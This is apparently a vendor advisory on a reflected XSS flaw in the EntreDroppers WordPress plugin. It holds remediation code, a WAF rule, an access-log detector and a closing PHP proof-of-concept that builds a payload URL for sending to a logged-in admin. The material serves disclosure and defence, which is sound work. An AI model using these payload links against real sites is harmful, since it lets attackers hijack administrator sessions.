Atomic Edge analysis of CVE-2026-8628 (metadata-based):
This is a reflected cross-site scripting (XSS) vulnerability in the EntreDroppers WordPress plugin, version 1.1.2 and earlier. It lets an unauthenticated attacker inject arbitrary web script into pages through the request path that PHP exposes as PHP_SELF (the advisory calls it the "PHP_SELF parameter", but it is a server variable populated from the URL, not a named request parameter). The CVSS score is 6.1 (medium severity): network attack vector, low attack complexity, no privileges required, user interaction required, changed scope, and low confidentiality and integrity impact, which corresponds to the CVSS 3.1 vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N.
The root cause is insufficient input sanitization and output escaping where the plugin writes PHP_SELF into a form action attribute. PHP_SELF holds the path portion of the current request URL, including any path-info that follows the script name, and PHP does not sanitize it in any way. The plugin likely echoes $_SERVER['PHP_SELF'] directly into an HTML form tag's action attribute without escaping, so whatever the browser sent in the path lands verbatim in the page. This is a classic XSS pattern: the developer either does not escape the server variable at all or escapes it for the wrong context. Atomic Edge infers this from the CWE-79 classification and from the description's mention of "insufficient input sanitization and output escaping" specifically for PHP_SELF.
Exploitation is straightforward. The attacker crafts a URL that carries JavaScript in the path-info segment after the script name, for example /wp-admin/admin.php/%22%3E%3Cscript%3Ealert(0)%3C/script%3E/?page=EntreDroppers.php. Where the web server accepts trailing path-info for PHP scripts (the usual Apache/PHP configuration), admin.php still runs, and when the victim, a user logged in to wp-admin who can reach the plugin page, clicks the link, the plugin page reflects the decoded path-info into the form's action attribute. The %22%3E sequence closes the attribute and the form tag, the script element that follows is parsed as markup, and the browser executes it. The attacker needs no account on the site; the only requirement is that the victim be logged in and click the link. Because the payload travels in the URL path rather than in a form field, the link is well suited to phishing or social engineering campaigns.
Remediation requires the plugin developer to escape the PHP_SELF value before embedding it in HTML. For a form action attribute the right WordPress helper is esc_url(), which strips characters that cannot legitimately appear in a URL (quotes and angle brackets included) and rejects unsafe schemes; esc_attr() also prevents breaking out of the attribute but does not validate the URL. Better still, the plugin can stop reflecting the request path altogether and build the action from admin_url() with a static path. Since no patched version is available from WordPress.org, users should disable the plugin or deploy a virtual patch until a fix is released.
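The anti-pattern and both fixes side by side, as an added example that is not code from the EntreDroppers plugin or from the Atomic Edge page. The script runs outside WordPress, so esc_url(), esc_attr() and admin_url() are simplified stand-ins for the WordPress functions (esc_url reproduces WP's character stripping but omits its protocol checks); the form markup, the site URL and the "entredroppers" menu slug are assumptions. The PHP_SELF value is constructed from the payload in the advisory.

```php
<?php
// Added example: PHP_SELF reflected raw versus escaped versus not reflected at all.
// esc_url(), esc_attr() and admin_url() below are simplified stand-ins so the
// script runs without WordPress; the markup and slug are assumptions.

// Stand-in for WordPress esc_url(): WP strips every character outside its allowed
// set (so <, >, " and whitespace disappear) and then entity-encodes single quotes.
// WP's scheme whitelist is omitted here.
function esc_url(string $url): string {
    $url = preg_replace('|[^a-z0-9-~+_.?#=!&;,/:%@$\|*\'()\[\]\x80-\xff]|i', '', $url);
    return str_replace("'", '&#039;', $url);
}

// Stand-in for esc_attr(): entity-encode the characters that matter inside an attribute.
function esc_attr(string $text): string {
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Stand-in for admin_url(): the site URL is assumed.
function admin_url(string $path = ''): string {
    return 'https://example.com/wp-admin/' . ltrim($path, '/');
}

// Vulnerable pattern: PHP_SELF echoed straight into the action attribute.
function render_form_vulnerable(array $server): string {
    return '<form method="post" action="' . $server['PHP_SELF'] . '">' . "\n"
         . '<input type="submit" value="Save"></form>';
}

// Fix 1a: keep PHP_SELF but escape it for a URL-in-attribute context.
function render_form_esc_url(array $server): string {
    return '<form method="post" action="' . esc_url($server['PHP_SELF']) . '">' . "\n"
         . '<input type="submit" value="Save"></form>';
}

// Fix 1b: attribute escaping alone also stops the breakout (quotes and brackets
// become entities) but does not reject unsafe URL schemes.
function render_form_esc_attr(array $server): string {
    return '<form method="post" action="' . esc_attr($server['PHP_SELF']) . '">' . "\n"
         . '<input type="submit" value="Save"></form>';
}

// Fix 2 (preferred): do not reflect the request path at all; derive the action
// from a constant slug and escape it anyway.
function render_form_static(): string {
    $action = admin_url('admin.php?page=entredroppers');
    return '<form method="post" action="' . esc_url($action) . '">' . "\n"
         . '<input type="submit" value="Save"></form>';
}

// Constructed request: path-info carries the attribute-breakout payload from the advisory.
$server = ['PHP_SELF' => '/wp-admin/admin.php/"><script>alert(0)</script>/'];

echo "VULNERABLE (script tag becomes live markup):\n", render_form_vulnerable($server), "\n\n";
echo "esc_url (quotes and brackets stripped):\n",     render_form_esc_url($server),    "\n\n";
echo "esc_attr (quotes and brackets encoded):\n",     render_form_esc_attr($server),   "\n\n";
echo "STATIC (request path never reaches the page):\n", render_form_static(),          "\n";
```

Run it with `php example.php`: only the first form contains a parseable `<script>` element; the esc_url variant reduces the path to `/wp-admin/admin.php/scriptalert(0)/script/`, the esc_attr variant keeps the text but as `&quot;&gt;&lt;script&gt;...`, and the static variant never touches PHP_SELF, which is why it is the fix to prefer.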
The impact of successful exploitation is that of a reflected XSS: the attacker runs arbitrary script in the victim's browser in the context of the WordPress admin area. That enables session hijacking, credential theft, redirection to malicious sites, or defacement. The attack needs user interaction (clicking a crafted link), and the CVSS vector records only low confidentiality and integrity impact rather than direct data modification or privilege escalation. In practice, though, script executing in an administrator's session can drive any admin action that user is allowed to perform, so the medium rating should not be read as harmless. Scope is changed because the injected script acts on the whole site, not just on the vulnerable plugin component.
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-8628 (metadata-based)
# Blocks reflected XSS attempts against the EntreDroppers plugin via PHP_SELF path-info.
# Attack vector: /wp-admin/admin.php/<payload>/?page=EntreDroppers.php
# Logic (all three chained rules must match): a request to admin.php that carries
# path-info (rule 1), a page parameter naming the plugin (rule 2), and XSS markers in
# the decoded request (rule 3).
# PATH_INFO is only populated when the web server exposes path info to ModSecurity
# (Apache embedded mode); REQUEST_URI is checked as well so the rule still fires behind
# nginx or a reverse proxy. REQUEST_URI includes the query string, so markers there are
# blocked too. The marker regex catches <script>, inline event handlers, javascript: URLs
# and the quote-plus-bracket attribute breakout; it is deliberately narrow to avoid false
# positives on legitimate path-info, so treat it as a virtual patch, not a general XSS filter.
SecRule REQUEST_URI "@rx ^/wp-admin/admin\.php/[^?]+" \
    "id:20268628,phase:2,deny,status:403,log,chain,\
    msg:'CVE-2026-8628 EntreDroppers Reflected XSS via PHP_SELF',\
    severity:'CRITICAL',tag:'CVE-2026-8628',tag:'WordPress',tag:'XSS'"
    SecRule ARGS_GET:page "@streq EntreDroppers.php" "chain"
    SecRule REQUEST_URI|PATH_INFO "@rx (?:<script\b|</script|<[a-z]+[^>]*\bon[a-z]+\s*=|javascript:|[\"'][^>]*>)" \
        "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
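The same request shape the rule blocks can also be hunted for after the fact. The following is an added example, not code from the Atomic Edge page: a small scanner that parses Apache combined-format access log lines, decodes the path-info after admin.php the way PHP would before populating PHP_SELF (including double-encoded variants), and reports lines carrying XSS markers, noting whether the page parameter targets the plugin. The log lines, IP addresses and timestamps are constructed; the URL shape and plugin slug come from the advisory.

```php
<?php
// Added example: retrospective detection of CVE-2026-8628 probes in access logs.
// Sample log lines below are constructed; the URL shape comes from the advisory.

// Same marker set as the WAF rule: script tags, inline event handlers,
// javascript: URLs, and a quote followed by a closing bracket (attribute breakout).
const XSS_MARKERS = '/(?:<script\b|<\/script|<[a-z]+[^>]*\bon[a-z]+\s*=|javascript:|["\'][^>]*>)/i';

// Returns a finding for a suspicious line, or null when the line is not of interest.
function check_access_log_line(string $line): ?array {
    // Minimal combined-log parse: client IP, then the quoted request line, then status.
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
        return null;
    }
    [, $ip, $method, $target, $status] = $m;

    $parts = parse_url($target);
    if ($parts === false || !isset($parts['path'])) {
        return null;
    }
    // Only requests that put path-info after admin.php can reach the PHP_SELF sink.
    if (!preg_match('#^/wp-admin/admin\.php(/.*)$#', $parts['path'], $pm)) {
        return null;
    }

    // Decode like the server does, repeating a few times so %2522 -> %22 -> " is caught.
    $path_info = $pm[1];
    for ($i = 0; $i < 3; $i++) {
        $decoded = rawurldecode($path_info);
        if ($decoded === $path_info) {
            break;
        }
        $path_info = $decoded;
    }
    if (!preg_match(XSS_MARKERS, $path_info)) {
        return null;
    }

    parse_str($parts['query'] ?? '', $query);
    return [
        'ip'             => $ip,
        'method'         => $method,
        'status'         => (int) $status,
        'path_info'      => $path_info,
        'targets_plugin' => (($query['page'] ?? '') === 'EntreDroppers.php'),
    ];
}

// Scans a list of log lines and returns findings with 1-based line numbers.
function scan_access_log(array $lines): array {
    $findings = [];
    foreach ($lines as $n => $line) {
        $f = check_access_log_line($line);
        if ($f !== null) {
            $f['line'] = $n + 1;
            $findings[] = $f;
        }
    }
    return $findings;
}

// Constructed sample: one plain probe, one benign plugin visit, one double-encoded
// event-handler probe that got redirected, and one harmless path-info request.
$sample = [
    '203.0.113.7 - - [12/Mar/2026:10:01:02 +0000] "GET /wp-admin/admin.php/%22%3E%3Cscript%3Ealert(0)%3C/script%3E/?page=EntreDroppers.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Mar/2026:10:02:10 +0000] "GET /wp-admin/admin.php?page=EntreDroppers.php HTTP/1.1" 200 4801 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2026:10:03:44 +0000] "GET /wp-admin/admin.php/%2522%253E%253Cimg%20src%3Dx%20onerror%3Dalert(1)%253E/?page=EntreDroppers.php HTTP/1.1" 302 0 "-" "curl/8.0"',
    '192.0.2.9 - - [12/Mar/2026:10:05:00 +0000] "GET /wp-admin/admin.php/settings/?page=EntreDroppers.php HTTP/1.1" 200 4801 "-" "Mozilla/5.0"',
];

foreach (scan_access_log($sample) as $f) {
    printf("line %d: %s from %s status=%d targets_plugin=%s path_info=%s\n",
        $f['line'], $f['method'], $f['ip'], $f['status'],
        $f['targets_plugin'] ? 'yes' : 'no', $f['path_info']);
}
```

On the constructed sample only lines 1 and 3 are reported; line 2 has no path-info and line 4's path-info contains no markers. A 302 on line 3 means the probe hit the login redirect for an anonymous client, which is the usual trace of an attacker testing the link before sending it to a logged-in victim.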
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-8628 - EntreDroppers <= 1.1.2 - Reflected Cross-Site Scripting via PHP_SELF
// This PoC builds the crafted link and optionally checks whether the payload is reflected.
// All payload parameters are configurable below.
$target_url  = 'http://example.com';   // Change this to the target WordPress URL
$plugin_page = 'EntreDroppers.php';    // The plugin's admin page slug
// Optional: cookies of a logged-in user ("wordpress_logged_in_...=...; ...").
// wp-admin redirects anonymous requests to wp-login.php, so the reflection check
// below only sees the plugin page when a valid session cookie is supplied.
$session_cookie = '';
// The malicious payload is injected into the path-info segment of the URL.
// PHP_SELF reflects the path portion, so the attribute breakout and script tag
// land inside the form action attribute.
$payload = '"><script>alert("XSS");</script>';
// Construct the malicious URL: the payload goes in the path-info after the script name.
// rawurlencode() is used because this is a path segment (spaces become %20, not +).
$exploit_url = rtrim($target_url, '/') . '/wp-admin/admin.php/' . rawurlencode($payload) . '/?page=' . $plugin_page;
echo "[+] Atomic Edge CVE-2026-8628 PoC\n";
echo "[+] Exploit URL: " . $exploit_url . "\n";
echo "[+] Send this link to an authenticated admin user.\n";
echo "[+] Upon clicking, the injected script executes in their browser.\n\n";
// Verification: request the URL and check whether the payload comes back unescaped.
// The reflection happens server-side, so a raw HTTP request is enough to observe it.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Lab use only: accepts self-signed certificates
if ($session_cookie !== '') {
    curl_setopt($ch, CURLOPT_COOKIE, $session_cookie);
}
$response  = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
// curl_exec() returns false on a transport failure; read the error before closing the handle
if ($response === false) {
    echo "[!] Error: Could not reach target: " . curl_error($ch) . "\n";
    curl_close($ch);
    exit(1);
}
curl_close($ch);
echo "[+] HTTP status: " . $http_code . "\n";
// Look for the unescaped script tag; an entity-encoded or stripped copy means the output is escaped.
if (strpos($response, '<script>alert("XSS");</script>') !== false) {
    echo "[+] SUCCESS: Payload reflected in response. Vulnerability confirmed.\n";
} else {
    echo "[-] Payload not found in response. The target may be patched, not vulnerable, or the request was redirected to the login page (no session cookie).\n";
}
?>